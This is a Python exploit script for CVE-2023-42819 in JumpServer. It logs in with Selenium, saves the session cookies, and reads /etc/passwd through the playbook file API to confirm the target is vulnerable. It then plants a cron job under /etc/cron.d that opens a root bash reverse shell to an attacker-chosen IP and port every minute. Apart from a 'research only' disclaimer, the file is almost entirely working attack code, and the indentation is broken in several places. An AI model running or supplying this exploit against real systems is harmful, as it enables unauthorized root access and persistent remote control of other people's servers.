CVE-2023-42819.py
# -*- coding: utf-8 -*-
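"""
CVE-2023-42819 exploit for JumpServer: logs in through Selenium to collect session
cookies, then abuses the Ansible playbook file API (/api/v1/ops/playbook/<uid>/file/)
to read /etc/passwd as a vulnerability check and to drop a cron entry under /etc/cron.d
that spawns a reverse shell. Requires valid credentials; for research use only.
"""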
import argparse
import json
import logging
import os
import random
import string
import sys
import time
from urllib.parse import urljoin
import colorlog
import httpx
from selenium import webdriver
from selenium.webdriver.chrome.service import Service
from selenium.webdriver.common.by import By
from selenium.webdriver.support.wait import WebDriverWait
# Proxy settings (empty unless --proxy is supplied)
PROXIES = {}
def banner():
print('''
██████╗██╗ ██╗███████╗ ██████╗ ██████╗ ██████╗ ██████╗ ██╗ ██╗██████╗ █████╗ ██╗ █████╗
██╔════╝██║ ██║██╔════╝ ╚════██╗██╔═████╗╚════██╗╚════██╗ ██║ ██║╚════██╗██╔══██╗███║██╔══██╗
██║ ██║ ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝ █████╔╝█████╗███████║ █████╔╝╚█████╔╝╚██║╚██████║
██║ ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝ ╚═══██╗╚════╝╚════██║██╔═══╝ ██╔══██╗ ██║ ╚═══██║
╚██████╗ ╚████╔╝ ███████╗ ███████╗╚██████╔╝███████╗██████╔╝ ██║███████╗╚█████╔╝ ██║ █████╔╝
╚═════╝ ╚═══╝ ╚══════╝ ╚══════╝ ╚═════╝ ╚══════╝╚═════╝ ╚═╝╚══════╝ ╚════╝ ╚═╝ ╚════╝
@Auth: C1ph3rX13
@Blog: https://c1ph3rx13.github.io
    @Note: This code is for learning and research purposes only; do not use it for anything else
''')
def setup_color_logging():
    # Create a colorlog logger
logger_setting = colorlog.getLogger()
logger_setting.setLevel(logging.INFO)
    # Create a console handler and set its formatter
console_handler = logging.StreamHandler(sys.stdout)
console_formatter = colorlog.ColoredFormatter(
'%(asctime)s - %(log_color)s%(levelname)s - %(message)s',
datefmt='%Y-%m-%d %H:%M:%S',
reset=True,
log_colors={
'DEBUG': 'cyan',
'INFO': 'green',
'WARNING': 'yellow',
'ERROR': 'red',
'CRITICAL': 'bold_red',
}
)
console_handler.setFormatter(console_formatter)
    # Attach the handler to the logger
logger_setting.addHandler(console_handler)
return logger_setting
# Module-level logger instance
logger = setup_color_logging()
def create_driver():
    # Path to chromedriver, using the Service class (Selenium > 4.9)
    service = Service(executable_path='webdriver/chromedriver.exe')
    # Configure ChromeOptions
    options = webdriver.ChromeOptions()
    # Route the browser through the proxy only when one was supplied
    if PROXIES.get('all://'):
        options.add_argument(f"--proxy-server={PROXIES['all://']}")
    options.add_argument('--disable-gpu')
    options.add_argument('--no-sandbox')
    options.add_argument('--window-size=1400,800')
    # Create the browser instance
    driver = webdriver.Chrome(service=service, options=options)
    return driver
def do_login(target: str, username: str, password: str):
    # Create the browser instance
    browser = create_driver()
    # Open the login page
    url = urljoin(target, '/core/auth/login/')
    browser.get(url=url)
    time.sleep(2)
    # Locate the username/password inputs and the submit button
    username_input = browser.find_element(by=By.NAME, value='username')
    password_input = browser.find_element(by=By.ID, value='password')
    btn = browser.find_element(by=By.XPATH, value='//*[@id="login-form"]/div[5]/button')
    # Explicit waits until the elements are visible
    wait = WebDriverWait(browser, timeout=3)
    wait.until(lambda _: username_input.is_displayed())
    wait.until(lambda _: password_input.is_displayed())
    wait.until(lambda _: btn.is_displayed())
    # Clear the inputs
    username_input.clear()
    password_input.clear()
    # Fill in the credentials
    username_input.send_keys(username)
    password_input.send_keys(password)
    # Submit the form
    btn.click()
    # Collect all cookies of the current session (list of dicts)
    cookies = browser.get_cookies()
    # Serialize the cookies to a JSON string
    json_cookies = json.dumps(cookies)
    # Cookie file path
    cookie_name = './cookie.json'
    # Write the JSON cookies to a local file
    with open(cookie_name, "w") as f:
        f.write(json_cookies)
    # Give the session a moment before closing
    time.sleep(5)
    # Quit the browser (also terminates the chromedriver process)
    browser.quit()
def generate_random_letters(length):
    letters = string.ascii_letters  # all upper- and lower-case letters
    random_letters = ''.join(random.choices(letters, k=length))  # pick `length` random letters and join them
    return random_letters
def add_cookies():
    try:
        # Read cookie.json
        with open('./cookie.json', "r") as f:
            json_cookies = f.read()
        # Parse the JSON cookies back into a list of dicts
        cookies = json.loads(json_cookies)
        # Convert the cookie list into a simple name -> value dict
        cookies_dict = {cookie['name']: cookie['value'] for cookie in cookies}
        # Return the cookies
        return cookies_dict
    except FileNotFoundError as error:
        logger.error('Read Error: %s', error)
def add_header(cookies: dict):
    # Base headers; the X-CSRFToken header is added below
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36',
    }
    # Read jms_csrftoken from the cookies
    CSRFToken = cookies['jms_csrftoken']
    # The API requires the X-CSRFToken header to be present
    headers.update({'X-CSRFToken': CSRFToken})
    return headers
def uid_verify(target: str, cookies: dict, headers: dict):  # used when a playbook object already exists
    # Set API URL
    uid_url = urljoin(target, '/api/v1/ops/playbooks/')
    # Get uid
    try:
        with httpx.Client(headers=headers, verify=False, follow_redirects=False, cookies=cookies,
                          proxies=PROXIES) as client:
            uid_resp = client.get(url=uid_url)
            # Extract the playbook ids from the response
            if uid_resp.status_code == httpx.codes.OK and 'id' in uid_resp.text:
                uid_data = json.loads(uid_resp.text)
                ids = [entry['id'] for entry in uid_data]
                logger.critical('Playbook API INFO: %s', uid_resp.text)
                logger.critical('Playbook UID: %s', ids)
                return ids[0]
            else:
                logger.critical('Playbook UID does not exist')
    except (httpx.RequestError, httpx.HTTPStatusError) as error:
        logger.error('Request error or HTTP status error: %s', error)
def add_playbook(target: str, cookies: dict, headers: dict):
    playbook_url = urljoin(target, '/api/v1/ops/playbooks/')
    # Random playbook name
    playbook_name = generate_random_letters(4)
    json_data = {
        'name': playbook_name,
    }
    try:
        with httpx.Client(headers=headers, verify=False, follow_redirects=False, cookies=cookies,
                          proxies=PROXIES) as client:
            add_resp = client.post(url=playbook_url, json=json_data)
            if add_resp.status_code == 201 and 'id' in add_resp.text:
                logger.critical('Successfully Added: %s', add_resp.text)
            elif add_resp.status_code == 400:
                logger.error('Fields must be Unique: %s', add_resp.text)
            else:
                logger.error('Unknown Error: %s %s', add_resp.headers, add_resp.text)
    except (httpx.RequestError, httpx.HTTPStatusError) as error:
        logger.error('Request error or HTTP status error: %s', error)
def poc(target: str, uid: str, cookies: dict, headers: dict):
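    # CVE-2023-42819: the playbook file endpoint accepts an arbitrary 'key' path,
    # so fetching /etc/passwd through it confirms the target is vulnerable.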
poc_url = urljoin(target, '/api/v1/ops/playbook/' + uid + '/file/?key=/etc/passwd')
try:
with httpx.Client(headers=headers, verify=False, follow_redirects=False, cookies=cookies,
proxies=PROXIES) as client:
poc_resp = client.get(url=poc_url)
if 'root' in poc_resp.text:
                logger.critical('Vulnerable: %s', poc_resp.url)
logger.critical('Output: %s', poc_resp.text)
return True
else:
logger.critical('Not Vulnerable')
return False
except (httpx.RequestError, httpx.HTTPStatusError) as error:
logger.error('Request error or HTTP status error: %s', error)
def exp(target: str, uid: str, cookies: dict, headers: dict, shell_ip: str, shell_port: str):
    # Plant a cron job through the playbook file API
    exp_url = urljoin(target, '/api/v1/ops/playbook/' + uid + '/file/')
    # JSON body for creating the /etc/cron.d directory
    json_data = {
        "key": "/etc/cron.d",  # path to create
        "is_directory": True,  # create a directory
        "name": "/etc/cron.d",  # name of the directory
    }
    # Random name for the cron file
    shell_name = generate_random_letters(4)
    # JSON body for the reverse-shell cron file
    shell_data = {
        "key": "/etc/cron.d",  # directory the file is created in
        "is_directory": False,  # create a file, not a directory
        "name": shell_name,  # file name
        "content": f"* * * * * root bash -c \"bash -i >& /dev/tcp/{shell_ip}/{shell_port} 0>&1\"\n"
        # file content: a cron entry that spawns a reverse shell every minute
    }
    try:
        with httpx.Client(headers=headers, verify=False, follow_redirects=True, cookies=cookies,
                          proxies=PROXIES) as client:
            # Create the cron.d directory
            exp_resp = client.post(url=exp_url, json=json_data)
            if exp_resp.status_code == httpx.codes.OK:
                logger.critical('Directory is Successfully Created: %s', exp_resp.text)
                # Create the reverse-shell cron job
                shell_resp = client.post(url=exp_url, json=shell_data)
                if shell_resp.status_code == httpx.codes.OK:
                    logger.critical('Reverse Shell is Successfully Set: %s', shell_resp.text)
                else:
                    logger.critical('Reverse Shell Failed: %s', shell_resp.text)
            else:
                logger.critical('Directory Creation Failed: %s', exp_resp.text)
    except (httpx.RequestError, httpx.HTTPStatusError) as error:
        logger.error('Request error or HTTP status error: %s', error)
def get_params(target: str):
    # Load cookies
    cookies = add_cookies()
    # Build headers
    headers = add_header(cookies)
    # Look up the playbook uid
    uid = uid_verify(target, cookies, headers)
    return uid, cookies, headers
def check_and_exploit(target: str, uid: str, cookies: dict, headers: dict, shell_ip: str, shell_port: str):
if poc(target, uid, cookies, headers):
exp(target, uid, cookies, headers, shell_ip, shell_port)
def main(target: str, username: str, password: str, shell_ip: str, shell_port: str):
    # Check whether the cookie file already exists
    if not os.path.exists('./cookie.json'):
        # Log in and save cookies first
        logger.warning('Cookie file does not exist, logging in')
        do_login(target, username, password)
        # If a uid exists, run the poc and exp steps
        uid, cookies, headers = get_params(target)
        if uid:
            check_and_exploit(target, uid, cookies, headers, shell_ip, shell_port)
        else:
            # No uid yet: create a playbook first, then retry
            add_playbook(target, cookies, headers)
            uid, cookies, headers = get_params(target)
            check_and_exploit(target, uid, cookies, headers, shell_ip, shell_port)
    else:
        # Cookies already saved: reuse them and look up the uid directly
        uid, cookies, headers = get_params(target)
        # If a uid exists, run the poc and exp steps
        if uid:
            check_and_exploit(target, uid, cookies, headers, shell_ip, shell_port)
        else:
            # No uid yet: create a playbook first, then retry
            add_playbook(target, cookies, headers)
            uid, cookies, headers = get_params(target)
            check_and_exploit(target, uid, cookies, headers, shell_ip, shell_port)
if __name__ == '__main__':
banner()
parser = argparse.ArgumentParser(description='CVE-2023-42819 by C1ph3rX13.')
parser.add_argument('-t', '--target', type=str, required=True, help='target url')
parser.add_argument('-u', '--username', type=str, required=True, help='account username')
parser.add_argument('-p', '--password', type=str, required=True, help='account password')
parser.add_argument('--ip', type=str, required=True, help='shell ip')
parser.add_argument('--port', type=str, required=True, help='shell port')
parser.add_argument("--proxy", type=str, required=False, help="proxy to http://ip:port")
args = parser.parse_args()
if args.proxy:
PROXIES = {'all://': f'{args.proxy}'}
main(args.target, args.username, args.password, args.ip, args.port)
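    # Example invocation (illustrative values):
    #   python CVE-2023-42819.py -t http://target:8080 -u admin -p admin --ip 10.0.0.1 --port 4444 --proxy http://127.0.0.1:8080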